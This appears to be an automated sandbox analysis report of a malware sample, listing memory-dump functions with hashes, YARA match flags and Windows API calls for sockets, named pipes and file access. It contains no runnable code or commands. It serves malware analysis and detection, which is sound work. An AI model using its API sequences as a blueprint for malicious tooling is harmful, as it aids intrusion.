Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58687b4274debebf6ef9be367ad4083ea578bb25be663956fce47dc36b95e8e
Instruction ID: da6e636a2be7a30cdb226d6f19d63543c123edba97aef609d8f74d3322bfbcbc
Opcode Fuzzy Hash: d58687b4274debebf6ef9be367ad4083ea578bb25be663956fce47dc36b95e8e
Instruction Fuzzy Hash: 0C41D626B0C960CAEF14DF67B081266A781F784B94FC94A71DB6CC33D6E63CC8D48A54

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA748E97 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
Instruction ID: 99e2aa02342c5ddf1e316dc65d6395705c1e6883d79e616f829bf4df865d40a2
Opcode Fuzzy Hash: b70fd7dd056a9b0a37c440412f3a3cc8b7f7d80adc55c15e2758a15b9bb8beac
Instruction Fuzzy Hash: 9D613CB62185508BD724CB18E4D066AB7F1F3CC784F84462AE78E8B768DE3CD645DB40

Uniqueness

Uniqueness Score: -1.00%

Function 007FCC40 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99aa3362e0fae6ba7644898695639d652c383d49ebde3f6fe34dd5debeefff09
Instruction ID: 952489f4832a017a49c388d43f4282936bc9b662d5fecd1dd5e31233d2321d4d
Opcode Fuzzy Hash: 99aa3362e0fae6ba7644898695639d652c383d49ebde3f6fe34dd5debeefff09
Instruction Fuzzy Hash: CD4106A2B0BE4C45CD07D77A926136492066F97BE0F94C7229E3B763E5EB1D8142C700

Uniqueness

Uniqueness Score: -1.00%

Function 007EBCE0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761b4fa4c9c6909cff5458a8b574c35f2ff9124edea93a1a6d47873791f75b59
Instruction ID: bb0f5db42cf1200e499581fb39433793c0a5985525998e86cd298eba2c908e29
Opcode Fuzzy Hash: 761b4fa4c9c6909cff5458a8b574c35f2ff9124edea93a1a6d47873791f75b59
Instruction Fuzzy Hash: 6A2106A1F55F444ACA47DB3A9400316D20ABF9ABD0F98C722EE1FB7795EB28D4D24340

Uniqueness

Uniqueness Score: -1.00%

Function 00801B00 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3858237565030efc3a5805ffa3325667dcb8750a34ec9ecca8517c00a3f6e2cc
Instruction ID: 4e334a118bb34d99dba029ba5cb42313dbbf108b8dd38cf8af54ba97b67b59fc
Opcode Fuzzy Hash: 3858237565030efc3a5805ffa3325667dcb8750a34ec9ecca8517c00a3f6e2cc
Instruction Fuzzy Hash: D031826A304B8982DB44DB19F4853EA6B61F384BC4F849032DF4F53B69DE38C249CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0080C8C0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18dd18fc89b9262c866e951396e44af603892b498411838825a551ab99f4a5ba
Instruction ID: 11a28de2f681439c1b2b9e5ea8ee1290e8dc20a1239e0d24aea6a6e5d17fda38
Opcode Fuzzy Hash: 18dd18fc89b9262c866e951396e44af603892b498411838825a551ab99f4a5ba
Instruction Fuzzy Hash: 95212E37608B85C5DB40CF25E44136BBB60F399BD4F549722EAAD83BA9DB38C195CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00822880 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117c70a4ece2bbfef9b7e00ec8db8d8275946c3925fb79aa3e91043058965852
Instruction ID: 15cb3b40cc99434298567436d861a74e94cfc427d7d99d23de622870ac6ed9a4
Opcode Fuzzy Hash: 117c70a4ece2bbfef9b7e00ec8db8d8275946c3925fb79aa3e91043058965852
Instruction Fuzzy Hash: 6C211636208F89D4DA40DF21F88136A7B60F34AB84F44C622EADC93766DF39C191CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74E020 Relevance: .0, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
Instruction ID: df8b5dfc0245ebe5b218bc27c219532fbe320ad3f0d53b99b53263afd6800530
Opcode Fuzzy Hash: ce50915e01d19d553e501072b1d9aa96a4661ac9f51e51d5d5a12a94cd83616d
Instruction Fuzzy Hash: 5F019BA7E5DADB0AF253A5142C693E41FF0AFF2B71F6D405A8AE8071D3EC464E054213

Uniqueness

Uniqueness Score: -1.00%

Function 0083C6E0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3167c093347cd75bf6baa84ff3d6eba6e300f2ba704162d1ca620226c56fdab9
Instruction ID: 63c71c95d73f46720d3ffe8718dc61973ac2697f716d148575a4425e53be4e14
Opcode Fuzzy Hash: 3167c093347cd75bf6baa84ff3d6eba6e300f2ba704162d1ca620226c56fdab9
Instruction Fuzzy Hash: 26E0EC25614A80C0D6204B19E84135A7760F7887B4F940312AEBC077E4CE38C2628F40

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74E628 Relevance: .0, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction ID: 75aecfe011d9751ebce3c824c0f1d780aeff9b335672c3f94e3984e37400695d
Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction Fuzzy Hash: 79D0ECB7A5D6DB06F2A3A2245C3D2D91FB05BA2670F4C405FC6840A293E8592A018217

Uniqueness

Uniqueness Score: -1.00%

Function 0083A860 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4eac9b0b687d13309d65334518f6419e4ed03623cd172bbb1f34855ead0b5a
Instruction ID: 311b48865e997300c6551425e4425cd69bc93e66386b56e85cc2a7828dbf7c94
Opcode Fuzzy Hash: aa4eac9b0b687d13309d65334518f6419e4ed03623cd172bbb1f34855ead0b5a
Instruction Fuzzy Hash: 75C02BF0907FC658FB14C304B20130039C5DFC43C8D80C0A4D3D840225DB2CC3829244

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74E4E8 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
Instruction ID: dd2e783b0636133bd3e97f2dddbba3448d2db5b0b3945c869a14d0cd44983660
Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
Instruction Fuzzy Hash: 55D0C9ABA1DEDA4EF3A3A15C1C692B92FF09BE2E60B0D40569B880A192A5450D004222

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74E050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction ID: 016d09eb630bf1efa165a40c17891acab689d0e8a945a9950bb6019b29a62930
Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction Fuzzy Hash: 20C08027A185C543E313E51004561D42FB1DBC2E72F8F41944D9007C4354060D035301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735248 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 0000017DEA7352A5
select.WS2_32 ref: 0000017DEA735313
__WSAFDIsSet.WS2_32 ref: 0000017DEA73532B
accept.WS2_32 ref: 0000017DEA735348
ioctlsocket.WS2_32 ref: 0000017DEA735360
__WSAFDIsSet.WS2_32 ref: 0000017DEA735403
accept.WS2_32 ref: 0000017DEA735419

Part of subcall function 0000017DEA734154: ioctlsocket.WS2_32 ref: 0000017DEA734176

__WSAFDIsSet.WS2_32 ref: 0000017DEA73549B
__WSAFDIsSet.WS2_32 ref: 0000017DEA7354B3
closesocket.WS2_32 ref: 0000017DEA735575

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: c3319fb4cbf24cbfdae2e174894a45f5c1125c925141e30d007c99f121c1abae
Instruction ID: 9945c0c0504ed878f52d753372982ae2af2d0815a4141f375581cdef46d13ec4
Opcode Fuzzy Hash: c3319fb4cbf24cbfdae2e174894a45f5c1125c925141e30d007c99f121c1abae
Instruction Fuzzy Hash: 28919072215B9A9AEB62EF25E8403ED33B2FBC4794F100135EA8D4BA95DF35D264C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA739DE4 Relevance: 19.7, APIs: 13, Instructions: 238stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 0000017DEA739E2E
malloc.LIBCMT ref: 0000017DEA739E57
strtok.LIBCMT ref: 0000017DEA739E93
strtok.LIBCMT ref: 0000017DEA739EC1
_time64.LIBCMT ref: 0000017DEA739ECF
malloc.LIBCMT ref: 0000017DEA73A07B
strtok.LIBCMT ref: 0000017DEA73A0CE
strtok.LIBCMT ref: 0000017DEA73A150

Part of subcall function 0000017DEA73D4B4: _getptd.LIBCMT ref: 0000017DEA73D4D3

free.LIBCMT ref: 0000017DEA73A161

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

malloc.LIBCMT ref: 0000017DEA73A179
strtok.LIBCMT ref: 0000017DEA73A1AB

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
String ID:
API String ID: 620445413-0
Opcode ID: f3941ba55fe43d2af69a1b800eaf21d8c24c130adf4bc5f8194ce19ef3ab75b1
Instruction ID: 5d88356c307ba4f87bcbf6352de517ae34b79751af6412e25e3582508253cecd
Opcode Fuzzy Hash: f3941ba55fe43d2af69a1b800eaf21d8c24c130adf4bc5f8194ce19ef3ab75b1
Instruction Fuzzy Hash: BCB177B020C64A96EB1BFB10B8513F937B1BFC4790FA1463999DD4F2A1CE39C6548702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA733B10 Relevance: 19.6, APIs: 13, Instructions: 105pipesleepfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA733D14
GetTickCount.KERNEL32 ref: 0000017DEA733D20
CreateFileA.KERNEL32 ref: 0000017DEA733D4E
GetLastError.KERNEL32 ref: 0000017DEA733D5D
WaitNamedPipeA.KERNEL32 ref: 0000017DEA733D72
Sleep.KERNEL32 ref: 0000017DEA733D7F
GetTickCount.KERNEL32 ref: 0000017DEA733D85
GetLastError.KERNEL32 ref: 0000017DEA733D9B
GetLastError.KERNEL32 ref: 0000017DEA733DB3
SetNamedPipeHandleState.KERNEL32 ref: 0000017DEA733DDE
GetLastError.KERNEL32 ref: 0000017DEA733DE8
DisconnectNamedPipe.KERNEL32 ref: 0000017DEA733E62
CloseHandle.KERNEL32 ref: 0000017DEA733E6B

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$Handle$CloseCreateDisconnectFileSleepStateWait
String ID:
API String ID: 832653698-0
Opcode ID: 0a85449faa1f51963aa2df0f1b09b7c9b8b21afb2d13fdae2c291ed2339458a4
Instruction ID: ac3c9e38017948babe30eda2640e5dff990f7a1ae2922f43c39f0a57bde4a568
Opcode Fuzzy Hash: 0a85449faa1f51963aa2df0f1b09b7c9b8b21afb2d13fdae2c291ed2339458a4
Instruction Fuzzy Hash: D8414D35208A0A86F722EB61F4547FD2375EBC4BA4F154631DE9E4BB94CF38C6498342

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72E8D4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0000017DEA72E971

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

_snprintf.LIBCMT ref: 0000017DEA72E98D
_snprintf.LIBCMT ref: 0000017DEA72EA03
